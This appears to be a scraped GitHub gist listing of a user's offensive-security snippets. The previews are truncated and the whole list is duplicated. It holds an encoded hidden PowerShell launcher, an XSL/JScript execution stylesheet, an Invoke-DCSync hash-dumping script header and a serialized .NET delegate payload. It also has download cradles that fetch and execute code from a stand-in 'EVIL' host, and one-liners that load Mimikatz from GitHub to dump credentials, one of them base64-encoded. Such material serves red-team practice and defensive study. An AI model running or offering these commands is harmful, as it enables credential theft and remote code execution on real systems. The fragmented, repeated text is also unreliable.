Andrew H. Johnston ajohnston9

## gist:499597b1b98cab57d5246cad8521e3e3
alert(1);

## test.blah
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADQAKwBpAFQAQgBiACsAMwBQADAAcgArAEQAQwBKAG0AbgBhADgAdABvADcAOQBKAHAATwA4AGcASwBMAFkAdwBJAGcASQBYAG4AbwA3AEgAWQBRAFMAUwBvAHQATABjAHgATgA4ADkALwAzAHYAZQB3AHEAMQBwADIAZQBuAFoAMwBlAFMAWABSAEoAUwBWAFYAQwBuAHoAbgBPAGUAYwA2AG0AagBvAGUAUwB6AGwAawBUAFkAUwB1AFQAQQBSAHMAeABuAEEAMABVAHgARABuAHkAbQBjADMAdQA3AFMAMwAwAHIAbwBYAE0ANgBlAFgARgBRADgAaABKAEcAZwBmAFYAaQAyAG4AYQBFADQAcABqADUANgAvAFoAbQBaAGsAYQBtAHgAMQBRAC8AWgBXAGIAMAA0AGcAVgAyAFMAbABDAGQASwBSAGQAMABJADcATABUAEMATgBWAHUAYgBtADUAdgB5AGsAKwBwAEgANQBzADcAOQBPAEsAYgBDAGMANwBRAGkANABjAFMATgA3AEIAagA1AGkAdABUAGYAVwBMAEQAYwBCAGgANABKAHYAYQBmAC8ALwBpAEQAVAA2AE0ASQArAGMAbAA1ADMAUgBpAGoAaABJADEAagA1AEcAMABKAFIAbgBHADEAeAB2AHkAVABXAGIAbwBvAFEAcAArAC8AYgBmAGYASQBTAHAAaQAvAG0ARQA4AHYAagBUAEUASgB0AGkAYQA1AGIAQwB0ADQAMAAzAEwAQgBDAHQAYQAzAD

## gist:58c6b286380222fb501ad446a221b707
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation.  All rights reserved. -->

<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />

<ms:script implements-prefix="user" language="JScript">
<![CDATA[


## Invoke-DCSync.ps1
function Invoke-DCSync
{
<#
.SYNOPSIS

Uses dcsync from mimikatz to collect NTLM hashes from the domain.

Author: @monoxgas
Improved by: @harmj0y

## katz.js

var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                ajohnston9
                / keybase.md
            
            
              Created
              November 6, 2017 18:17
            
          
    Keybase proof

I hereby claim:

I am ajohnston9 on github.
I am ahjohnston25 (https://keybase.io/ahjohnston25) on keybase.
I have a public key ASCXXr2gkURRlYnXF9QyX6lBTbQU9jESEUh6G3bqBTEnxQo

To claim this, I am signing this object:

  
## Powershell One-Liners
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==

#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-m
	<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
	<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->

	<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
	<xsl:strip-space elements="*" />

	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	function Invoke-DCSync
	{
	<#
	.SYNOPSIS

	Uses dcsync from mimikatz to collect NTLM hashes from the domain.

	Author: @monoxgas
	Improved by: @harmj0y

	var serialized_obj = [
	0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
	101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
	101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
	68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
	103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
	122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
	101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!

	#mimikatz
	IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

	#encoded-mimikatz
	powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==

	#mimikittenz
	IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-m